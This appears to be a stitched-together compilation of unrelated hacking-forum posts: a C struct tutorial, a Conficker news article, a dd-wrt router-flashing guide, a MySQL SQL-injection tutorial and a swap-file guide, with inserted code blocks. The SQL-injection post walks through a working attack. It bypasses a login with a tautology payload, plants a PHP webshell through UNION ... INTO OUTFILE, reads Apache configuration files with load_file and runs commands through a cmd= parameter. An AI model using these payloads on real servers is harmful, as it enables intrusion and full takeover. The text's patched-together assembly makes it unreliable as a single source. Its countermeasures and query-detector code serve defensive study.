     * returns NULL the request for more memory failed, and the creation of the
     * new object should fail too. It's good practice to free the space used by
     * any reference data type that won't be used anymore. That's why I use
     * free(void*) every time inconsistent data or a failed system call appears.
     */
    if((nPerson->pName = (char *) malloc(strlen(name) + 1))==NULL){
        free(nPerson);//To free the space used by nPerson
        return NULL;
    }
    /*
     * strcpy copies the characters of name (and the null byte) into pName.
     * Writing nPerson->pName = name would only copy the
     * address of name into nPerson->pName.
     */
    strcpy(nPerson->pName,name);
    return nPerson;
}




You can also use "." instead of "->", but you need to change some things... I think it is easier to work this way...

Explanation of the code:
Here I declare the members of the "class". In this case you have pName, pAge, pGender.


struct PERSON{
    char* pName;
    int pAge;
    int pGender;
};



Here I rename the "class" from "struct PERSON" to "Person". It's just to write less code :)


typedef struct PERSON Person;


Then I declare the "constructor" of the "class"


Person* newPerson(char*, int, int);
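
Below is an added, complete version of the Person example (example code written for this page, not the original author's). It keeps the page's struct and constructor but reserves strlen(name) + 1 bytes, because strlen does not count the null byte and malloc(strlen(name)) followed by strcpy writes one byte past the end of the buffer, a real heap overflow. It also adds a freePerson destructor and a describePerson function, both names of this example's own choosing, to show releasing the memory in the right order and formatting into a bounded buffer with snprintf.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct PERSON {
    char *pName;
    int pAge;
    int pGender;   /* 0 for man, 1 for woman */
};
typedef struct PERSON Person;

/* Constructor. Returns NULL on bad input or when memory cannot be reserved. */
Person *newPerson(const char *name, int age, int gender)
{
    if (name == NULL || age < 0 || (gender != 0 && gender != 1)) {
        return NULL;                       /* reject inconsistent data first; nothing to free yet */
    }
    Person *p = (Person *)malloc(sizeof(Person));
    if (p == NULL) {
        return NULL;
    }
    size_t len = strlen(name);             /* does not count the terminating null byte */
    p->pName = (char *)malloc(len + 1);    /* +1: malloc(strlen(name)) is one byte short */
    if (p->pName == NULL) {
        free(p);                           /* undo the first allocation on failure */
        return NULL;
    }
    memcpy(p->pName, name, len + 1);       /* copies the characters and the null byte */
    p->pAge = age;
    p->pGender = gender;
    return p;
}

/* Destructor: release the string first, then the struct that owns it. */
void freePerson(Person *p)
{
    if (p != NULL) {
        free(p->pName);
        free(p);
    }
}

/*
 * Bounded description of a person. snprintf never writes more than n bytes
 * (n-1 characters plus the null byte), so a small buffer cannot be overrun;
 * the return value says how many characters the full text needs.
 */
int describePerson(const Person *p, char *out, size_t n)
{
    return snprintf(out, n, "%s (%d, %s)", p->pName, p->pAge,
                    p->pGender == 0 ? "man" : "woman");
}

int main(void)
{
    Person *p = newPerson("Alice", 30, 1);
    if (p == NULL) {
        return 1;
    }
    char line[64];
    describePerson(p, line, sizeof line);
    printf("%s\n", line);                  /* Alice (30, woman) */
    freePerson(p);
    return 0;
}
```

Validating the arguments before the first malloc means there is only one failure path that has to free anything, which is easier to get right than the original's repeated free/return pairs.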



reference:zeroidentity

Conficker??? real or fake

Taken from thesun.co.uk

The Windows worm called Conficker could give a hacker unrestricted access to every infected machine on the planet.
And the aggressive bug could be hiding on your PC at home right now, waiting to kick in.
For the hackers, it’s like having a virtual army at their fingertips.
The criminals behind it have the power to launch a tidal wave of junk emails, bringing computers grinding to a halt.
They could also plunder information, including your bank details.
But the truth is that the best techie brains in the business just don’t know exactly what the hackers have in mind.
Infected

Virus expert Mikko Hypponen, from the firm F-Secure, said: “It is scary thinking about how much control a hacker could have over all these computers. They would have access to millions of machines.”
Microsoft, who developed the Windows computer operating system, have slapped a £175,000 bounty on whoever is responsible, so far without success.
The sophisticated Conficker bug — also known as Downadup or Kido — targets systems via the web and can be spread on memory sticks.
More than nine million computers were infected at the bug’s peak last month.
And if Conficker is still on your system come Wednesday, you could be in trouble.
Once inside your PC, it sets up files and starts downloading information from a controlling “boss” server.
Finding that website and the mastermind behind it all is like looking for a needle in a haystack.
That is because the bug creates hundreds of bogus addresses every day to put investigators off the scent.
The infected PCs then form a network and “talk” to each other, updating and evolving.
The bug even attacks anti-virus software and other files on your computer to strengthen its position.
And it resets “restore” points, making recovery of your old system even harder.



The first of three Conficker strains was discovered in November last year.
A second, more aggressive strain followed in December and a third this month. This contains the all-important April 1 trigger.


To avoid infection, Windows users must download a special free update “patch” from the Microsoft website. But that isn’t enough — you also need good anti-virus software too.
Many businesses around the world are thought also to be at risk after failing to update systems.
Graham Cluley, from computer security firm Sophos, warned: “Microsoft did a good job of updating people’s home computers.
“But the virus continues to infect businesses that have ignored the update.”
He also stressed the need for strong passwords on your computer, adding: “If users are using weak passwords — 12345, QWERTY etc — then the virus can crack them.”
F-Secure’s Mikko warned potential problems with Conficker would be highlighted wildly before April 1.
But he said he didn’t foresee an attack, despite the fears and mystery surrounding the problem.
He said: “There’s always hype — just think of previous cases.
“There is not going to be a ‘global virus attack’. We don’t know what they are planning to do, if anything.
“I think the machines that are already infected might do something new on April 1.”
Let’s hope, for everyone’s sake, that it turns out to be an April Fools’ Day hoax.

What M$ have to say about it:
Win32/Conficker.D is a variant of Win32/Conficker. Conficker.D infects the local computer, terminates services and blocks access to numerous Web sites. This variant does not spread to removable drives or shared folders across a network and is installed by previous variants of Win32/Conficker.

Other variants of Win32/Conficker infect computers across a network by exploiting a vulnerability in the Windows Server service (SVCHOST.EXE). If the vulnerability is successfully exploited, it could allow remote code execution when file sharing is enabled. It may also spread via removable drives and weak administrator passwords. It disables several important system services and security products.

Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately.


Microsoft also recommends that users ensure that their network passwords are strong to prevent Win32/Conficker variants from spreading via weak administrator passwords.

Hack your router! Get better wireless range!

Ever wanted to control the times at which others can use your internet, or see if your neighbors are leeching off your wifi? Tired of the shitty web interface on your router? Got nothing better to do? Well, dd-wrt is for you.

dd-wrt is a linux based, open source firmware for your router, adding many features such as remote access, bandwidth management, and as I mentioned the ability to kick your siblings off of limewire to free up bandwidth.

Sound awesome? It is. Before you get all excited, check and make sure your router is compatible with dd-wrt.

http://www.dd-wrt.com/dd-wrtv3/dd-wrt/hardware.html

If it is, keep reading; if it's not, sucks to be you and gtfo.

THIS GUIDE IS FOR THE WEB INSTALL ONLY! VISIT dd-wrt.com FOR TFTP INSTALL

Things you're going to need

*about an hour's worth of time or less, depending on your IQ
*compatible router
*linux, windows xp or vista
*network cable

First off, download dd-wrt.
http://www.dd-wrt.com/dd-wrtv3/dd-wrt/downloads.html
choose v24 SP1, then click consumer, and find who makes your router. THEN click on its model number. From there, download the file

dd-wrt.v24_mini_generic.bin

and keep it on your desktop.

Now it's time to get your hands dirty with installing.

***************WARNING READ THIS******************
Incorrectly flashing will brick (break) your router! If you're a 12 year old regular scriptkiddie on here, DON'T DO THIS UNLESS YOU CAN REPLACE YOUR ROUTER.

You have been warned, don't bitch at me if you mess up.


First off, open firefox (yes firefox; if you're using internet explorer you need to switch now) and go to http://192.168.1.1/. WHAT'S THIS, A WEB PAGE? No, this is your router on your local network. If you get a blank page, your router may have a different IP address than the usual one I just posted.

TO FIND OUT YOUR ROUTER IP, (on windows)
Click start > run and type in cmd
in the command prompt, type ipconfig
you should see the following:


AND THIS BLOCK OF TEXT IS TAKEN FROM DD-WRT.COM
If you know the IP address, username, and password of your router:

1. Follow the instructions in the next section to log in to the Web GUI.
2. Click the "Administration" tab.
3. Click the "Factory Defaults" sub-tab.
4. Select "Yes".
5. Click the "Save Settings" button.
6. A new page will open, click "continue".

If you do not know the IP address, username, or password of your router, read above or LEARN TO READ, I CAN'T SPOON FEED YOU ANY MORE.

and now back to my guide.


This will clear all settings on your router... setting the stage for dd-wrt.

Now it's time to do a 30/30/30 reset. While the router is plugged in, hold the reset button for 30 seconds. While still holding the reset button, unplug the unit for 30 seconds and plug it back in, whilst still holding the reset button, for another 30 seconds while the unit is running.

In other words, HOLD THE BUTTON FOR 1 minute 30 seconds while unplugging the router and plugging it back in.

The stage is now set to upload the dd-wrt firmware.


*******************FINAL BLUNT WARNING*****************
FUCKING UP WILL BREAK YOUR ROUTER IF YOU HAVE A LOW IQ DO NOT CONTINUE
****************************************************

following text taken from dd-wrt.com
1. First do a hard reset on the unit that DD-WRT is to be loaded onto.
2. You should be in the Web GUI of the router. Go there now. (192.168.1.1 in your web browser)
3. Click the "Administration" tab
4. Click the "Firmware Upgrade" sub-tab.
5.
6. Click the "Browse" button and select the DD-WRT .bin file you downloaded and confirmed. (file is dd-wrt.v24_mini_generic.bin on your desktop)
7. Click the "Upgrade" button.
8. The router will take a few minutes to upload the file and flash the firmware. During this time, the power light will flash.
9. A new page will open confirming that the upload was successful (Installation#Possible errors if not). Now wait about 5 minutes before clicking "Continue".
10. Lastly, do another hard reset on the unit. (same thing as above, 30/30/30 reset)
11. If flashed successfully you will now be able to access the DD-WRT web interface at 192.168.1.1

END OF COPIED TEXT

12. If you can't access the web interface at 192.168.1.1, you're pretty boned now, aren't you? (in other words, your router is probably bricked Roflmao)

Go ahead and play with your new firmware. Turn up the power on your antennas to 52 mW (NOT PAST 52 UNLESS YOU WANT A FIRE AND/OR BURNT HARDWARE)

More copied text from dd-wrt.com, in case you had an "upload failed" error. I already told you to use the generic version of the firmware anywho, so you're probably just thick.

Possible Errors

During the firmware upload process, if your router says something similar to, "Upload Failed," you may be using the wrong version of DD-WRT. This may occur through the web GUI if you use a *wrt54g.bin version when you should have selected the generic version instead. It may also be that your router requires the mini version to be flashed before the full version. Be sure to double check to make sure you have the right version. If you are certain that your router is supported and that you have the correct firmware, you may simply need to use a different web browser (e.g. from Firefox to Internet Explorer).

END OF COPIED TEXT

and that's it for my guide. You can explore dd-wrt and play with its features yourself. If you have any problems during install, LOOK AT THEIR GODDAMNED GUIDE at http://www.dd-wrt.com/wiki/index.php/Installation

This is a watered down, spoon fed version of it. I can't make it any easier than it already is. Blunt, simple, and to the point.

rep me if you think it's a decent guide.

questions or comments? Post here; don't even think about pm'ing me with trivial questions covered on dd-wrt.com or in my guide.

good luck and don't brick your router!

reference: das pacman@hackforums

Backdoor webserver using MySQL SQL Injection

MySQL Database is a great product used by thousands of websites. Various web applications use MySQL as their default database. Some of these applications are written with security in mind, and some are not. In this article, I would like to show you how you can exploit SQL injection in order to gain almost full control over your webserver.

Most people know that SQL injection allows attackers to retrieve database records, bypass login screens, and change database content, for instance through the creation of new administrative users. Unlike Microsoft SQL Server, MySQL does not have a built-in command to execute shell commands. I will show you how to run arbitrary commands using standard features provided by MySQL.

First of all, I would like to give a brief description of SQL injection, then I would like to present a couple of less known features that exist in MySQL, which I will use to backdoor a webserver. I will use 2 built-in MySQL commands: one that writes arbitrary files and one that can be used to read arbitrary files. After that I will describe webshells and go on to the attack itself.
What is SQL Injection?

SQL injection is an attack that allows the attacker to add logical expressions and additional commands to an existing SQL query. This attack can succeed whenever user-submitted data is not properly validated and is glued together with a legitimate SQL query.

For example, the following SQL command is used to validate user login requests:
$sql_query = "select * from users where user='$user' and password='$pass'";

If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafted variables. For example, the attacker can submit the following data as the $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as follows:

$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'";


Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.

Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files

MySQL has a built-in command that can be used to create and write system files. This command has the following format:

mysql> select "text" INTO OUTFILE "file.txt"

One notable property of this command is that it can be appended to an existing query using the UNION SQL token.

For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'

Resulting query:
select user, password from user where user="admin" and password='123' union
select "text",2 into outfile "/tmp/file.txt" -- '

As a result of the above command, the /tmp/file.txt file will be created, containing the query result.
Command 2- Reading arbitrary files

MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.

mysql> select load_file("PATH_TO_FILE");
Webshell


Webshell is a popular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands.

Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):


For example, in the following screenshot, id command is executed.



Attack Scenario

1. Find SQL injection

It is out of the scope of this document. You must first find SQL injection.

2. Find a directory with write permission

To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:

* hxxp://www.target.com/templates_compiled/
* hxxp://www.target.com/templates_c/
* hxxp://www.target.com/templates/
* hxxp://www.target.com/temporary/
* hxxp://www.target.com/images/
* hxxp://www.target.com/cache/
* hxxp://www.target.com/temp/
* hxxp://www.target.com/files/

In our example we will use a temp directory.

3. Exploit SQL injection - create web shell

You need to append the following string to the legitimate SQL command:

UNION SELECT "",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:

* 2,3,4 are just filler values used to make the same number of columns as in the first part of the select query.
* /var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
* temp is a directory with full write access. In your case it could be a different directory.

The above command will write the query's result with the "" string appended. Because we gave the file a .php extension, this string will be treated as PHP code and will allow us to execute shell commands!

4. Execute shell commands

Now comes the easiest part. Simply open the page on the webserver to execute shell commands. In our example it will be:

* hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND

For example:

* hxxp://www.target.com/temp/c.php?cmd=id

Plan B

In case you failed to create a PHP file due to a wrong path, there are a number of workarounds:

1. Generate PHP errors.

You need to create a situation in which a PHP script fails and the full disk path is printed in the error message. You can play with page parameters to make this happen.

2. Find the file that will print phpinfo().

In some cases you will be lucky and find a page that executes the phpinfo() function. This function prints a wealth of PHP internal information including the current directory location.

Try to access the following urls:

* hxxp://www.target.com/phpinfo.php
* hxxp://www.target.com/test.php
* hxxp://www.target.com/info.php

3. Look for a default web directory location.

You need to get a default web directory location for a web server. Check the following page since it has a big list of default Apache configurations that are used in different distributions.
http://wiki.apache.org/httpd/DistrosDefaultLayout

4. Read the Apache configuration files.

MySQL has a built-in function that allows reading arbitrary files. We can use it to read the Apache configuration files and study the directory structure. Simply use the load_file() MySQL function.

For example (SQL query after injection):
select user, password from user where user="admin123" and password='123' UNION select load_file("/etc/apache2/apache2.conf"), 2 -- '

Note:
You can find a location of Apache configurations at this resource:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Limitation

In order for the above to work, the MySQL user used by this application must have the FILE privilege. For example, by default the "root" user has this privilege. FILE is an administrative privilege that can only be granted globally (using ON *.* syntax).

For example, if the MySQL user was created using the following command, the user will have the FILE privilege:
GRANT ALL PRIVILEGES ON *.* TO 'USER_NAME'@'HOST_NAME' IDENTIFIED BY 'PASSWORD';
Countermeasures

1. Install the GreenSQL database firewall.

GreenSQL is an open source database firewall that can automatically block the commands described above: load_file and INTO OUTFILE. By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with a high risk. For example, the UNION token and SQL comments are taken into account. Check the application website for more information: http://www.greensql.net/

2. Do not use MySQL root user to access the database.

Do not use administrative users to access the database. It is recommended to create a distinct user with hardened permissions to access specific databases.

3. Revoke FILE permission from the MySQL user used in your applications.

mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';

4. Application code review.

Ensure that your application does not have any SQL injections and that the code is updated.
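
As an added example, not code from the article or from GreenSQL, the following C program sketches the kind of query check that countermeasure 1 describes and runs it on the queries from the "What is SQL Injection?" and "Attack Scenario" sections: it scores a statement for the tokens the article uses (UNION, INTO OUTFILE, load_file, SQL comments, and the '1'='1' tautology from the login example) and blocks high-scoring queries. The weights, the threshold of 30 and the function names (has_keyword, sql_risk_score, sql_is_blocked, glue_login_query, blocked_in_samples) are this example's own assumptions; the sample queries are constructed from the ones shown above. glue_login_query reproduces the article's vulnerable string-gluing pattern only so the detector can be run on its output; the real fix is parameterised queries, which keep data out of the SQL text altogether.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Case-insensitive keyword search with word boundaries, so "union" matches
 * "UNION select" but not a column called "reunion".
 */
static int has_keyword(const char *q, const char *kw)
{
    size_t n = strlen(kw);
    for (const char *p = q; *p != '\0'; p++) {
        size_t k = 0;
        while (k < n && p[k] != '\0' &&
               tolower((unsigned char)p[k]) == (unsigned char)kw[k]) {
            k++;
        }
        if (k == n) {
            int before_ok = (p == q) || !isalnum((unsigned char)p[-1]);
            int after_ok = !isalnum((unsigned char)p[n]);
            if (before_ok && after_ok) {
                return 1;
            }
        }
    }
    return 0;
}

/*
 * Risk score for one SQL statement. The weights are this example's own
 * (assumed) choices, not GreenSQL's: the file-access commands described in
 * the article are weighted so that they are blocked on their own.
 */
int sql_risk_score(const char *query)
{
    int score = 0;
    if (has_keyword(query, "into outfile") || has_keyword(query, "into dumpfile")) {
        score += 50;   /* writes a file on the database host */
    }
    if (has_keyword(query, "load_file")) {
        score += 50;   /* reads a file from the database host */
    }
    if (has_keyword(query, "union")) {
        score += 20;   /* the usual way to bolt an extra SELECT onto a query */
    }
    if (strstr(query, "--") != NULL || strstr(query, "/*") != NULL || strchr(query, '#') != NULL) {
        score += 10;   /* comment token, typically used to discard the query's tail */
    }
    if (has_keyword(query, "'1'='1")) {
        score += 30;   /* always-true expression from the login-bypass example */
    }
    return score;
}

/* Block anything scoring 30 or more (assumed threshold). */
int sql_is_blocked(const char *query)
{
    return sql_risk_score(query) >= 30;
}

/*
 * The article's vulnerable pattern: user input glued straight into the SQL
 * text. Returns 1 if the whole query fit in the buffer, 0 if it was cut off.
 */
int glue_login_query(char *out, size_t n, const char *user, const char *pass)
{
    int w = snprintf(out, n,
                     "select * from users where user='%s' and password='%s'",
                     user, pass);
    return w >= 0 && (size_t)w < n;
}

/* Constructed sample traffic: one legitimate query and three from the article. */
static const char *const SAMPLE_QUERIES[] = {
    "select user, password from user where user=\"alice\" and password='s3cret'",
    "select user, password from user where user=\"admin\" and password='123' union "
    "select \"text\",2 into outfile \"/tmp/file.txt\" -- '",
    "select user, password from user where user=\"admin123\" and password='123' "
    "UNION select load_file(\"/etc/apache2/apache2.conf\"), 2 -- '",
    "select * from users where user='admin' or '1'='1' and password='x'",
};

/* How many of the samples the firewall would block (3 of the 4 above). */
int blocked_in_samples(void)
{
    int blocked = 0;
    size_t count = sizeof SAMPLE_QUERIES / sizeof SAMPLE_QUERIES[0];
    for (size_t i = 0; i < count; i++) {
        if (sql_is_blocked(SAMPLE_QUERIES[i])) {
            blocked++;
        }
    }
    return blocked;
}
```

A token heuristic like this catches the file-access primitives outright, but it is a safety net rather than a fix: parameterised queries in the application and revoking FILE from the application's MySQL user (countermeasure 3) remain the primary controls.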
Links

1. MySQL Injection Cheat Sheet
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

2. SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

3. MySQL Documentation
http://dev.mysql.com/doc/

How To Change The Virtual Memory Swap File Size (Speed up computer, dramatically)

In this tutorial I'm going to tell you what the swap file is and how to configure it for best performance.

The swap file (virtual memory) is disk space that the Windows operating system uses to help manage applications when they exceed the amount of RAM configured in the computer. It's important that the swap file be allocated an amount of disk space appropriate for the amount of RAM in the computer. Opinions vary on how big the swap file should be, but most state it should be at least two or three times the size of the amount of RAM. This means if you have 512MB of RAM in the computer, the swap file should be configured to something like 1536MB. It doesn't need to be exact. The steps below show how I've allocated the swap file for My Super PC (NOT, actually the oldest computer in the world). As you can see, I've allocated about 3 times the 1024MB of RAM I have in My Super PC. If you have ample hard drive space then it's a good idea to go ahead and allocate this much space even if you have 512MB of RAM or less. That way it won't be necessary to remember to increase it should more RAM be added to the computer later.


To change the size of the swap file on Windows XP, click on the Start button and then right click on "My Computer" to bring up a small pop-up menu. On this menu, click on "Properties" to bring up the System Properties window.


The System Properties window looks like this. Click on the "Advanced" tab.



In the Performance sub-window, click on the "Settings" button.



The Performance Options window appears. Click on the "Advanced" tab.



In the Virtual memory sub-window, click on the "Change" button.



Here are the default values set by Windows XP for the amount of RAM I have in my computer.
Notice in the little window that the C: drive is highlighted showing that is the drive with the swap file, and that the size range of the swap file is also shown.



The "Custom size" option is already selected. Setting the "Initial size" and "Maximum size" to the same values increases efficiency and performance since Windows does not have to manage re-sizing the swap file.
Notice that the "Set" button - not the "Ok" button - needs to be clicked for the changes to actually be accepted.



Notice that the highlighted entry has changed to show the new configuration. Click on the "Ok" button.



Clicking on the "Ok" button again...



… and then again takes us back to the desktop.



Restart the computer for the changes to go into effect.


reference:hackforums